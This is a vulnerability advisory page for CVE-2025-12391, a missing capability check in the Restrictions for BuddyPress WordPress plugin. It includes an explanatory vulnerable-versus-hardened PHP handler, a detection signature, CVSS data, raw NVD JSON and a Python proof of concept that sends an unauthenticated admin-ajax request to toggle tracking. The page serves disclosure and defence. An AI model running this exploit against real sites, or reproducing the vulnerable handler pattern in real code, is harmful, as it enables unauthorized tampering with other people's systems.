Security Vulnerability Report
CVE-2025-12391 CVSS 5.3 MEDIUM

CVE-2025-12391

Published: 2025-11-18 10:15:47
Last Modified: 2026-04-15 00:35:42

Description

The Restrictions for BuddyPress plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the handle_optin_optout() function in all versions up to, and including, 1.5.2. This makes it possible for unauthenticated attackers to opt in and out of tracking.
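The flaw described above is a CWE-862 missing-authorization bug in an admin-ajax handler: WordPress runs `wp_ajax_{action}` hooks for logged-in users and `wp_ajax_nopriv_{action}` hooks for anonymous visitors, and performs no authorization of its own, so a handler that checks neither a capability nor a nonce is reachable by anyone. The following PHP is an added illustration, not the plugin's actual code: it shows a minimal reconstruction of the vulnerable pattern beside a hardened form. The AJAX action name is taken from the PoC on this page; the option name, the `manage_options` capability, the nonce action and the function names are assumptions.

```php
<?php
/**
 * Added illustration for CVE-2025-12391 (not the Restrictions for BuddyPress code).
 * Action name 'bp_restrict_optin_optout' is from the advisory's PoC; everything
 * else (option name, capability, nonce action, function names) is assumed.
 */

// --- Vulnerable pattern (reconstruction of what the advisory describes) ---
// Registering both hooks without a capability or nonce check means any visitor,
// authenticated or not, can flip the tracking preference.
// (Registration lines commented out so only the hardened handler is live here.)
// add_action( 'wp_ajax_bp_restrict_optin_optout',        'bpr_handle_optin_optout_vulnerable' );
// add_action( 'wp_ajax_nopriv_bp_restrict_optin_optout', 'bpr_handle_optin_optout_vulnerable' );

function bpr_handle_optin_optout_vulnerable() {
	$value = isset( $_POST['optin_optout'] )
		? sanitize_text_field( wp_unslash( $_POST['optin_optout'] ) )
		: '0';
	update_option( 'bpr_tracking_optin', $value ); // assumed option name
	wp_send_json_success();
}

// --- Hardened pattern ---
// 1. No wp_ajax_nopriv_ hook: anonymous requests never reach the handler.
// 2. Nonce check: the request must come from the plugin's own settings page.
// 3. Capability check: only users allowed to manage site options may change it.
// 4. Strict value whitelist: store only '0' or '1', never arbitrary input.
add_action( 'wp_ajax_bp_restrict_optin_optout', 'bpr_handle_optin_optout_hardened' );

function bpr_handle_optin_optout_hardened() {
	// Ends the request with HTTP 403 if the 'nonce' field is missing or invalid.
	check_ajax_referer( 'bpr_optin_optout', 'nonce' );

	// Assumed capability for a site-wide telemetry setting.
	if ( ! current_user_can( 'manage_options' ) ) {
		wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
	}

	$raw   = isset( $_POST['optin_optout'] ) ? wp_unslash( $_POST['optin_optout'] ) : '0';
	$value = ( '1' === $raw ) ? '1' : '0'; // 0 = opt-out, 1 = opt-in

	update_option( 'bpr_tracking_optin', $value ); // assumed option name
	wp_send_json_success( array( 'optin' => $value ) );
}

// The settings page script must send the matching nonce, e.g.:
// wp_localize_script( 'bpr-settings', 'bprAjax', array(
//     'url'   => admin_url( 'admin-ajax.php' ),
//     'nonce' => wp_create_nonce( 'bpr_optin_optout' ),
// ) );
```

The three controls are independent and each closes a different gap: dropping the `nopriv` hook blocks anonymous callers, `check_ajax_referer()` blocks cross-site requests riding on a logged-in session, and `current_user_can()` blocks low-privilege accounts. For detection, a POST to `admin-ajax.php` carrying this action with no WordPress login cookie is exactly the request the advisory describes and is a reasonable log signature while the plugin is below a fixed version.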

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Restrictions for BuddyPress plugin <= 1.5.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2025-12391 PoC - Unauthorized tracking preference modification
# Target: WordPress site with Restrictions for BuddyPress plugin <= 1.5.2

target_url = "http://target-wordpress-site.com"

# PoC to opt-out from tracking (set tracking preference to disabled)
payload = {
    'action': 'bp_restrict_optin_optout',
    'optin_optout': '0'  # 0 = opt-out, 1 = opt-in
}

try:
    # Send unauthenticated request to exploit the vulnerability
    response = requests.post(
        f"{target_url}/wp-admin/admin-ajax.php",
        data=payload,
        timeout=10
    )

    print(f"Status Code: {response.status_code}")
    print(f"Response: {response.text}")

    if response.status_code == 200:
        print("\n[+] PoC executed successfully - tracking preference may have been modified")
    else:
        print("\n[-] Request failed")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

References

https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3468480%40bp-restrict&new=3468480%40bp-restrict&sfp_email=&sfph_mail=
https://wordpress.org/plugins/bp-restrict/
https://www.wordfence.com/threat-intel/vulnerabilities/id/f4fe5ed7-17e2-4098-a51b-3b780721bf2e?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12391", "sourceIdentifier": "[email protected]", "published": "2025-11-18T10:15:47.250", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Restrictions for BuddyPress plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the handle_optin_optout() function in all versions up to, and including, 1.5.2. This makes it possible for unauthenticated attackers to opt in and out of tracking."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3468480%40bp-restrict&new=3468480%40bp-restrict&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/bp-restrict/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f4fe5ed7-17e2-4098-a51b-3b780721bf2e?source=cve", "source": "[email protected]"}]}}